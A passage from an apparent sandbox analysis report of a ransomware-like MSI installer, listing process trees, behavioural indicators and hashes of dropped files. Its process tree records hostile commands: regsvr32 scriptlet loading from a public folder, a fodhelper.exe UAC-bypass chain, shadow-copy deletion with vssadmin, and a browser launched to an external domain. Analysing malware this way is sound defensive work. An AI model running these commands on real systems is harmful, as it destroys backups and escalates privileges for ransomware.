SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe Token: SeTakeOwnershipPrivilege 4532 msiexec.exe Token: SeRestorePrivilege 4532 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msiexec.exemsedge.exepid process 5104 msiexec.exe 5104 msiexec.exe 1440 msedge.exe 1440 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesvchost.exesihost.exetaskhostw.exeMsiExec.execmd.exemsedge.exedescription pid process target process PID 4532 wrote to memory of 548 4532 msiexec.exe srtasks.exe PID 4532 wrote to memory of 548 4532 msiexec.exe srtasks.exe PID 4532 wrote to memory of 1312 4532 msiexec.exe MsiExec.exe PID 4532 wrote to memory of 1312 4532 msiexec.exe MsiExec.exe PID 2396 wrote to memory of 944 2396 svchost.exe regsvr32.exe PID 2396 wrote to memory of 944 2396 svchost.exe regsvr32.exe PID 2384 wrote to memory of 1144 2384 sihost.exe regsvr32.exe PID 2384 wrote to memory of 1144 2384 sihost.exe regsvr32.exe PID 2492 wrote to memory of 1156 2492 taskhostw.exe regsvr32.exe PID 2492 wrote to memory of 1156 2492 taskhostw.exe regsvr32.exe PID 1312 wrote to memory of 2628 1312 MsiExec.exe cmd.exe PID 1312 wrote to memory of 2628 1312 MsiExec.exe cmd.exe PID 2628 wrote to memory of 1440 2628 cmd.exe msedge.exe PID 2628 wrote to memory of 1440 2628 cmd.exe msedge.exe PID 1440 wrote to memory of 3704 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 3704 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 4548 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 8 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 8 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe PID 1440 wrote to memory of 860 1440 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 05BCD37A0E5588B5EF7FD2ED87E411762⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio&1&43548853&81&417&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff9211947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5512 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7f23c5460,0x7ff7f23c5470,0x7ff7f23c54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:85⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\glvt6878zbFilesize
1KB
MD5fe4a708f201a02075821a3adfbf46722
SHA10043a0976efb85b573fa959f7db59ff3ea751561
SHA256e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893
SHA512cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a
-
C:\Users\Public\glvt6878zbFilesize
1KB
MD5fe4a708f201a02075821a3adfbf46722
SHA10043a0976efb85b573fa959f7db59ff3ea751561
SHA256e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893
SHA512cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a
-
C:\Users\Public\glvt6878zbFilesize
1KB
MD5fe4a708f201a02075821a3adfbf46722
SHA10043a0976efb85b573fa959f7db59ff3ea751561
SHA256e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893
SHA512cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a
-
C:\Users\Public\rtuvkf9dnFilesize
3KB
MD59287a7c05440f4fba02ddc00bbc0d2dc
SHA1d6d4fd6acec6367ab60e52025090c95b03470812
SHA25627c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2
SHA512522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae
-
C:\Users\Public\rtuvkf9dnFilesize
3KB
MD59287a7c05440f4fba02ddc00bbc0d2dc
SHA1d6d4fd6acec6367ab60e52025090c95b03470812
SHA25627c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2
SHA512522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae
-
C:\Users\Public\rtuvkf9dnFilesize
3KB
MD59287a7c05440f4fba02ddc00bbc0d2dc
SHA1d6d4fd6acec6367ab60e52025090c95b03470812
SHA25627c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2
SHA512522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae
-
C:\Windows\Installer\MSIBDB2.tmpFilesize
52KB
MD5d6959db7ef3dd8a1d7576dc07b58ac20
SHA15d61f82d962bca473eb499a97dd8bd2b0c89787d
SHA256e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c
SHA512e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1
-
C:\Windows\Installer\MSIBDB2.tmpFilesize
52KB
MD5d6959db7ef3dd8a1d7576dc07b58ac20
SHA15d61f82d962bca473eb499a97dd8bd2b0c89787d
SHA256e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c
SHA512e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1
-
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2Filesize
23.0MB
MD5afc0194808d23b11be1a18aef9e10231
SHA114e204a1207e98a027ff36a6a69b11d5969682bc
SHA2562a0de9dcf6962a0724ccb9be7c3bd4cb6243a23be6da9be68c5b4258008f528d
SHA51218334fda61fef82440c4e65b813bd2fc1602c339632ca11118a30a749fc5be15f94aa3d7a1e16874bdaaf7dd7e9c4f462963939be16fbb86374f13f68ee4050a
-
\??\Volume{c8b84e5a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{8a04187e-bddd-4be7-adb4-759449331aa1}_OnDiskSnapshotPropFilesize
5KB
MD5814f9267a3d558df0d00ffdbec7a4948
SHA100cf74bd8c222add8811962adb1da3994512475a
SHA256e246fbed087412a7925a3d23feb8c2ee0e52a5541e669fcb942e1c9f43a963e5
SHA51209e0fe6b11c55ec3a728600a224dfcaaf9d16a19c31a3c5fb87fec93d607f7dee33d1d5e1028a0f5d5c3662fff7e05efe4dfdb700249937244e0b67d7dd86587
-
\??\pipe\LOCAL\crashpad_1440_EMJPZEEFKKUVNQAEMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/8-151-0x0000000000000000-mapping.dmp
-
memory/60-195-0x0000000000000000-mapping.dmp
-
memory/60-164-0x0000000000000000-mapping.dmp
-
memory/408-167-0x0000000000000000-mapping.dmp
-
memory/428-181-0x0000000000000000-mapping.dmp
-
memory/548-130-0x0000000000000000-mapping.dmp
-
memory/620-158-0x0000000000000000-mapping.dmp
-
memory/628-162-0x0000000000000000-mapping.dmp
-
memory/688-163-0x0000000000000000-mapping.dmp
-
memory/808-198-0x0000000000000000-mapping.dmp
-
memory/860-154-0x0000000000000000-mapping.dmp
-
memory/944-138-0x0000000000000000-mapping.dmp
-
memory/964-175-0x0000000000000000-mapping.dmp
-
memory/1080-193-0x0000000000000000-mapping.dmp
-
memory/1144-139-0x0000000000000000-mapping.dmp
-
memory/1156-141-0x0000000000000000-mapping.dmp
-
memory/1156-185-0x0000000000000000-mapping.dmp
-
memory/1156-177-0x0000000000000000-mapping.dmp
-
memory/1268-174-0x0000000000000000-mapping.dmp
-
memory/1268-191-0x0000000000000000-mapping.dmp
-
memory/1312-131-0x0000000000000000-mapping.dmp
-
memory/1312-140-0x00000222F4DF0000-0x00000222F4DFC000-memory.dmpFilesize
48KB
-
memory/1440-147-0x0000000000000000-mapping.dmp
-
memory/1488-192-0x0000000000000000-mapping.dmp
-
memory/1896-186-0x0000000000000000-mapping.dmp
-
memory/1932-188-0x0000000000000000-mapping.dmp
-
memory/2140-194-0x0000000000000000-mapping.dmp
-
memory/2148-170-0x0000000000000000-mapping.dmp
-
memory/2220-182-0x0000000000000000-mapping.dmp
-
memory/2332-173-0x0000000000000000-mapping.dmp
-
memory/2384-142-0x0000021BA90F0000-0x0000021BA90F3000-memory.dmpFilesize
12KB
-
memory/2620-196-0x0000000000000000-mapping.dmp
-
memory/2628-144-0x0000000000000000-mapping.dmp
-
memory/2652-179-0x0000000000000000-mapping.dmp
-
memory/2768-184-0x0000000000000000-mapping.dmp
-
memory/2840-187-0x0000000000000000-mapping.dmp
-
memory/3156-189-0x0000000000000000-mapping.dmp
-
memory/3188-168-0x0000000000000000-mapping.dmp
-
memory/3580-166-0x0000000000000000-mapping.dmp
-
memory/3704-148-0x0000000000000000-mapping.dmp
-
memory/3736-183-0x0000000000000000-mapping.dmp
-
memory/3764-169-0x0000000000000000-mapping.dmp
-
memory/4196-190-0x0000000000000000-mapping.dmp
-
memory/4252-156-0x0000000000000000-mapping.dmp
-
memory/4352-171-0x0000000000000000-mapping.dmp
-
memory/4380-160-0x0000000000000000-mapping.dmp
-
memory/4548-150-0x0000000000000000-mapping.dmp
-
memory/4852-165-0x0000000000000000-mapping.dmp